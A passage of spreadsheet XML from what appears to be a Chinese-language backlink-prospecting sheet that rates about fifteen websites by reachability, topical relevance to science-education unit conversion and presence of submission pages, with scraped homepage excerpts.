        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://searchingandshopping.com</x:v>
      </x:c>
    </x:row>
    <x:row r="154">
      <x:c r="A154" s="18" t="str">
        <x:v>153</x:v>
      </x:c>
      <x:c r="B154" s="19" t="str">
        <x:v>siurypulgar.com</x:v>
      </x:c>
      <x:c r="C154" s="19" t="str">
        <x:v>https://siurypulgar.com</x:v>
      </x:c>
      <x:c r="D154" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E154" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F154" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G154" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H154" s="19" t="str">
        <x:v>https://www.siurypulgar.com/</x:v>
      </x:c>
      <x:c r="I154" s="19" t="str">
        <x:v>Siury Pulgar</x:v>
      </x:c>
      <x:c r="J154" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K154" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L154" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M154" s="19" t="str">
        <x:v>https://www.siurypulgar.com/</x:v>
      </x:c>
      <x:c r="N154" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O154" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P154" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q154" s="21" t="str">
        <x:v>Siury Pulgar 0 Skip to Content Open Menu Close Menu Open Menu Close Menu Página en español Educational School Consultant Finding the right school changes everything. I help you find a school where your child feels seen, supported, and excited to learn. Learn more Siury Pulgar, Ed. M Hi, I’m Siury Pulgar —a Bay Area Parent &amp; School Consultant with over 15 years of experience helping families make education decisions that help their children truly thrive. I specialize in guiding thoughtful parents through the often-overwhelming school search with clarity, calm, and a deep understanding of how children learn best. International Best Selling Author Co-author of The Perfectly Imperfect Family — h</x:v>
      </x:c>
      <x:c r="R154" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S154" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T154" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://siurypulgar.com</x:v>
      </x:c>
    </x:row>
    <x:row r="155">
      <x:c r="A155" s="18" t="str">
        <x:v>154</x:v>
      </x:c>
      <x:c r="B155" s="19" t="str">
        <x:v>kindnessandgenerosity.com</x:v>
      </x:c>
      <x:c r="C155" s="19" t="str">
        <x:v>https://kindnessandgenerosity.com</x:v>
      </x:c>
      <x:c r="D155" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E155" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F155" s="20"/>
      <x:c r="G155" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H155" s="19" t="str"/>
      <x:c r="I155" s="19" t="str"/>
      <x:c r="J155" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K155" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L155" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M155" s="19" t="str">
        <x:v>https://kindnessandgenerosity.com</x:v>
      </x:c>
      <x:c r="N155" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O155" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P155" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q155" s="21" t="str"/>
      <x:c r="R155" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S155" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T155" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://kindnessandgenerosity.com
http://kindnessandgenerosity.com</x:v>
      </x:c>
    </x:row>
    <x:row r="156">
      <x:c r="A156" s="18" t="str">
        <x:v>155</x:v>
      </x:c>
      <x:c r="B156" s="19" t="str">
        <x:v>decoda.ca</x:v>
      </x:c>
      <x:c r="C156" s="19" t="str">
        <x:v>https://decoda.ca</x:v>
      </x:c>
      <x:c r="D156" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E156" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F156" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G156" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H156" s="19" t="str">
        <x:v>https://decoda.ca/</x:v>
      </x:c>
      <x:c r="I156" s="19" t="str">
        <x:v>Home - Decoda Literacy Solutions</x:v>
      </x:c>
      <x:c r="J156" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K156" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L156" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M156" s="19" t="str">
        <x:v>https://decoda.ca/</x:v>
      </x:c>
      <x:c r="N156" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O156" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P156" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q156" s="21" t="str">
        <x:v>Decoda is BC’s literacy organization. We support literacy programs, practitioners and a network of stakeholders across the province. Home - Decoda Literacy Solutions Skip to content Decoda Literacy Solutions Working together for literacy Menu About Us Our Blog Find a literacy program in BC Donate Our Work Literacy Outreach Coordination Displaced Workers IPALS, PALS &amp; ABPALS Fostering Literacy CALP Support The Westcoast Reader Business Services Resources Publications Community Adult Literacy Benchmarks Literacy Facts and Figures Literacy Calendar Library Library Information Library Catalogue Library Materials by Topic Training Webinars Decoda Literacy Conference Get Involved Family Literacy Week September Literacy Month Raise-a-Reader Campaign Ways to Give Search It's Literacy Month! Your Gift. Their Next Chapter. Working </x:v>
      </x:c>
      <x:c r="R156" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S156" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T156" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://decoda.ca</x:v>
      </x:c>
    </x:row>
    <x:row r="157">
      <x:c r="A157" s="18" t="str">
        <x:v>156</x:v>
      </x:c>
      <x:c r="B157" s="19" t="str">
        <x:v>home.blog</x:v>
      </x:c>
      <x:c r="C157" s="19" t="str">
        <x:v>https://home.blog</x:v>
      </x:c>
      <x:c r="D157" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E157" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F157" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G157" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H157" s="19" t="str">
        <x:v>https://home.blog/</x:v>
      </x:c>
      <x:c r="I157" s="19" t="str">
        <x:v>Home.blog – Appalachia + AGI + Automattic</x:v>
      </x:c>
      <x:c r="J157" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K157" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L157" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M157" s="19" t="str">
        <x:v>https://home.blog/</x:v>
      </x:c>
      <x:c r="N157" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O157" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P157" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q157" s="21" t="str">
        <x:v>Artwork by Michael BierutSite by Kjell Reigstad Home.blog – Appalachia + AGI + Automattic Skip to content Home.blog Appalachia + AGI + Automattic Menu Home.blog About A3 Michael Bierut Blog AGI Paintsville High Automattic Home Artwork by Michael Bierut Site by Kjell Reigstad Create Your . Home . Blog Support Blog at WordPress.com. Home.blog Sign up Log in Copy shortlink Report this content Manage subscriptions</x:v>
      </x:c>
      <x:c r="R157" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S157" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T157" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://home.blog</x:v>
      </x:c>
    </x:row>
    <x:row r="158">
      <x:c r="A158" s="18" t="str">
        <x:v>157</x:v>
      </x:c>
      <x:c r="B158" s="19" t="str">
        <x:v>twinkl.com.bh</x:v>
      </x:c>
      <x:c r="C158" s="19" t="str">
        <x:v>https://twinkl.com.bh</x:v>
      </x:c>
      <x:c r="D158" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E158" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F158" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G158" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H158" s="19" t="str">
        <x:v>https://www.twinkl.com.bh/</x:v>
      </x:c>
      <x:c r="I158" s="19" t="str"/>
      <x:c r="J158" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K158" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L158" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M158" s="19" t="str">
        <x:v>https://www.twinkl.com.bh/</x:v>
      </x:c>
      <x:c r="N158" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O158" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P158" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q158" s="21" t="str"/>
      <x:c r="R158" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S158" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T158" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.bh</x:v>
      </x:c>
    </x:row>
    <x:row r="159">
      <x:c r="A159" s="18" t="str">
        <x:v>158</x:v>
      </x:c>
      <x:c r="B159" s="19" t="str">
        <x:v>chasinghiddenworlds.com</x:v>
      </x:c>
      <x:c r="C159" s="19" t="str">
        <x:v>https://chasinghiddenworlds.com</x:v>
      </x:c>
      <x:c r="D159" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E159" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F159" s="20" t="str">
        <x:v>401</x:v>
      </x:c>
      <x:c r="G159" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H159" s="19" t="str">
        <x:v>https://chasinghiddenworlds.com/</x:v>
      </x:c>
      <x:c r="I159" s="19" t="str">
        <x:v>401 Authorization Required</x:v>
      </x:c>
      <x:c r="J159" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K159" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L159" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M159" s="19" t="str">
        <x:v>https://chasinghiddenworlds.com/</x:v>
      </x:c>
      <x:c r="N159" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O159" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P159" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q159" s="21" t="str">
        <x:v>401 Authorization Required 401 Authorization Required openresty</x:v>
      </x:c>
      <x:c r="R159" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S159" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T159" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://chasinghiddenworlds.com</x:v>
      </x:c>
    </x:row>
    <x:row r="160">
      <x:c r="A160" s="18" t="str">
        <x:v>159</x:v>
      </x:c>
      <x:c r="B160" s="19" t="str">
        <x:v>feraandsisters.com</x:v>
      </x:c>
      <x:c r="C160" s="19" t="str">
        <x:v>https://feraandsisters.com</x:v>
      </x:c>
      <x:c r="D160" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E160" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F160" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G160" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H160" s="19" t="str">
        <x:v>https://www.feraandsisters.com/</x:v>
      </x:c>
      <x:c r="I160" s="19" t="str">
        <x:v>Fera and Sisters</x:v>
      </x:c>
      <x:c r="J160" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K160" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L160" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M160" s="19" t="str">
        <x:v>https://www.feraandsisters.com/</x:v>
      </x:c>
      <x:c r="N160" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O160" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P160" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q160" s="21" t="str">
        <x:v>Fera and Sisters adalah serial buku cerita anak untuk storytelling tool (alat untuk bercerita) dalam proses therapeutic storytelling. Fera and Sisters top of page Home Books Fera Takut Gelap Fera Frustasi Author Resources Storytelling Fera Takut Gelap Fera Frustasi Top of Page Event News Why Books Welcome Kenapa Fera dapat membantu anak Anda? Buku cerita serial Fera and sisters adalah storytelling tool yang digunakan untuk membantu pembelajaran sosial emosional anak ( Social-Emotional Learning ). Buku ini dapat menolong orangtua dan guru untuk mengetahui cara meresponi yang empatik, belajar menenangkan diri mereka, hingga menginspirasi mereka ketika mereka mengalami perasaan-perasaan seperti takut, frustasi, dll. Buku ini juga dapat digunakan lebih dari sekedar buku cerita biasa, yaitu untuk menstimulasi perkembangan sosia</x:v>
      </x:c>
      <x:c r="R160" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S160" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T160" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://feraandsisters.com</x:v>
      </x:c>
    </x:row>
    <x:row r="161">
      <x:c r="A161" s="18" t="str">
        <x:v>160</x:v>
      </x:c>
      <x:c r="B161" s="19" t="str">
        <x:v>garmurdesign.com</x:v>
      </x:c>
      <x:c r="C161" s="19" t="str">
        <x:v>https://garmurdesign.com</x:v>
      </x:c>
      <x:c r="D161" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E161" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F161" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G161" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H161" s="19" t="str">
        <x:v>https://garmurdesign.com/</x:v>
      </x:c>
      <x:c r="I161" s="19" t="str">
        <x:v>Garmur Design</x:v>
      </x:c>
      <x:c r="J161" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K161" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L161" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M161" s="19" t="str">
        <x:v>https://garmurdesign.com/</x:v>
      </x:c>
      <x:c r="N161" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O161" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P161" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q161" s="21" t="str">
        <x:v>Discover Towel Bars at a great price. Our Bathroom Accessories category offers a great selection of Towel Bars and more. Garmur Design Search Menu Search Home Catalog Blog FAQ Home Catalog Blog FAQ Sold Out Save Liquid error (snippets/product-grid-item line 75): divided by 0% WS Bath Collections Venessia 52916-G Venessia Collection Self-Adhesive Wall Mount Towel Bar, 23.6", Polished Chrome Brand: WS Bath CollectionsColor: Polished ChromeFeatures: Made in Italy Made From Brass UPC Code... Sold Out Save Liquid error (snippets/product-grid-item line 75): divided by 0% WS Bath Collections Iceberg Collection Double Towel Bar Stand, 31.5" High, Polished Chrome Brand: WS Bath CollectionsColor: Polished ChromeFeatures: Made in Italy Made From Brass UPC Code... Sold Out Save Liquid error (snippets/product-grid-item lin</x:v>
      </x:c>
      <x:c r="R161" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S161" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T161" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://garmurdesign.com</x:v>
      </x:c>
    </x:row>
    <x:row r="162">
      <x:c r="A162" s="18" t="str">
        <x:v>161</x:v>
      </x:c>
      <x:c r="B162" s="19" t="str">
        <x:v>parentingwithindependence.com</x:v>
      </x:c>
      <x:c r="C162" s="19" t="str">
        <x:v>https://parentingwithindependence.com</x:v>
      </x:c>
      <x:c r="D162" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E162" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F162" s="20"/>
      <x:c r="G162" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H162" s="19" t="str"/>
      <x:c r="I162" s="19" t="str"/>
      <x:c r="J162" s="19" t="str">
        <x:v>可能相关站点</x:v>
      </x:c>
      <x:c r="K162" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L162" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M162" s="19" t="str">
        <x:v>https://parentingwithindependence.com</x:v>
      </x:c>
      <x:c r="N162" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O162" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P162" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q162" s="21" t="str"/>
      <x:c r="R162" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S162" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T162" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://parentingwithindependence.com
http://parentingwithindependence.com</x:v>
      </x:c>
    </x:row>
    <x:row r="163">
      <x:c r="A163" s="18" t="str">
        <x:v>162</x:v>
      </x:c>
      <x:c r="B163" s="19" t="str">
        <x:v>rookee.com.cn</x:v>
      </x:c>
      <x:c r="C163" s="19" t="str">
        <x:v>https://rookee.com.cn</x:v>
      </x:c>
      <x:c r="D163" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E163" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F163" s="20" t="str">
        <x:v>400</x:v>
      </x:c>
      <x:c r="G163" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H163" s="19" t="str">
        <x:v>https://rookee.com.cn/</x:v>
      </x:c>
      <x:c r="I163" s="19" t="str">
        <x:v>Invalid URL</x:v>
      </x:c>
      <x:c r="J163" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K163" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L163" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M163" s="19" t="str">
        <x:v>https://rookee.com.cn/</x:v>
      </x:c>
      <x:c r="N163" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O163" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P163" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q163" s="21" t="str">
        <x:v>Invalid URL Invalid URL The requested URL "[no URL]", is invalid. Reference #9.1e4e4317.1788322848.34217a74 https://errors.edgesuite.net/9.1e4e4317.1788322848.34217a74</x:v>
      </x:c>
      <x:c r="R163" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S163" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T163" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://rookee.com.cn</x:v>
      </x:c>
    </x:row>
    <x:row r="164">
      <x:c r="A164" s="18" t="str">
        <x:v>163</x:v>
      </x:c>
      <x:c r="B164" s="19" t="str">
        <x:v>aicbit.com</x:v>
      </x:c>
      <x:c r="C164" s="19" t="str">
        <x:v>https://aicbit.com</x:v>
      </x:c>
      <x:c r="D164" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E164" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F164" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G164" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H164" s="19" t="str">
        <x:v>http://aicbit.com/</x:v>
      </x:c>
      <x:c r="I164" s="19" t="str"/>
      <x:c r="J164" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K164" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L164" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M164" s="19" t="str">
        <x:v>http://aicbit.com/</x:v>
      </x:c>
      <x:c r="N164" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O164" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P164" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q164" s="21" t="str">
        <x:v>Domain registration has expired. Renewal instructions If you own this domain , you may still be able to renew it through your Namecheap account. To renew: sign in, open Domain List , select this domain , and choose Renew . Sign in · Renewal help · Renewal and redemption fees Renew this domain Want a domain name like this? Discover domains on auction now See all auctions Download the Namecheap Auctions app Take auctions with you wherever you go</x:v>
      </x:c>
      <x:c r="R164" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S164" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T164" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://aicbit.com
http://aicbit.com</x:v>
      </x:c>
    </x:row>
    <x:row r="165">
      <x:c r="A165" s="18" t="str">
        <x:v>164</x:v>
      </x:c>
      <x:c r="B165" s="19" t="str">
        <x:v>mpdevx.com</x:v>
      </x:c>
      <x:c r="C165" s="19" t="str">
        <x:v>https://mpdevx.com</x:v>
      </x:c>
      <x:c r="D165" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E165" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F165" s="20"/>
      <x:c r="G165" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H165" s="19" t="str"/>
      <x:c r="I165" s="19" t="str"/>
      <x:c r="J165" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K165" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L165" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M165" s="19" t="str">
        <x:v>https://mpdevx.com</x:v>
      </x:c>
      <x:c r="N165" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O165" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P165" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q165" s="21" t="str"/>
      <x:c r="R165" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S165" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T165" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://mpdevx.com
http://mpdevx.com</x:v>
      </x:c>
    </x:row>
    <x:row r="166">
      <x:c r="A166" s="18" t="str">
        <x:v>165</x:v>
      </x:c>
      <x:c r="B166" s="19" t="str">
        <x:v>dvonee.com</x:v>
      </x:c>
      <x:c r="C166" s="19" t="str">
        <x:v>https://dvonee.com</x:v>
      </x:c>
      <x:c r="D166" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E166" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F166" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G166" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H166" s="19" t="str">
        <x:v>https://dvonee.com/</x:v>
      </x:c>
      <x:c r="I166" s="19" t="str">
        <x:v>Dvonee.com - Beyond Clicks Into Context</x:v>
      </x:c>
      <x:c r="J166" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K166" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L166" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M166" s="19" t="str">
        <x:v>https://dvonee.com/</x:v>
      </x:c>
      <x:c r="N166" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O166" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P166" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q166" s="21" t="str">
        <x:v>Beyond Clicks Into Context Dvonee.com - Beyond Clicks Into Context Skip to content Sunday, 30 August 2026 10:07 pm Follow Us Dvonee.com Beyond Clicks Into Context Home Arts Entertainments Auto Business Cryptocurrency Digital Marketing Education Finance Gaming Health Fitness Home Kitchen Legal Law Lifestyle Fashion Medicine Pets Real Estate Relationship Shopping Product Reviews Sports Technology Tours Travel Privacy Policy Contact US Sitemap × Search TRENDING NEWS What is the difference between Workplace discrimination and harassment? How does adversarial simulation help organizations prepare for attacks? What is enforcement of decisions in unjust dismissal Canada? 웹사이트 검색누락 콘텐츠 늘리면 되나요? 힐링 공간으로 강남달토 괜찮아? Legal Law Wha</x:v>
      </x:c>
      <x:c r="R166" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S166" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T166" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://dvonee.com</x:v>
      </x:c>
    </x:row>
    <x:row r="167">
      <x:c r="A167" s="18" t="str">
        <x:v>166</x:v>
      </x:c>
      <x:c r="B167" s="19" t="str">
        <x:v>twinkl.co.th</x:v>
      </x:c>
      <x:c r="C167" s="19" t="str">
        <x:v>https://twinkl.co.th</x:v>
      </x:c>
      <x:c r="D167" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E167" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F167" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G167" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H167" s="19" t="str">
        <x:v>https://www.twinkl.co.th/</x:v>
      </x:c>
      <x:c r="I167" s="19" t="str"/>
      <x:c r="J167" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K167" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L167" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M167" s="19" t="str">
        <x:v>https://www.twinkl.co.th/</x:v>
      </x:c>
      <x:c r="N167" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O167" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P167" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q167" s="21" t="str"/>
      <x:c r="R167" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S167" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T167" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.co.th</x:v>
      </x:c>
    </x:row>
    <x:row r="168">
      <x:c r="A168" s="18" t="str">
        <x:v>167</x:v>
      </x:c>
      <x:c r="B168" s="19" t="str">
        <x:v>unknownbrewing.com</x:v>
      </x:c>
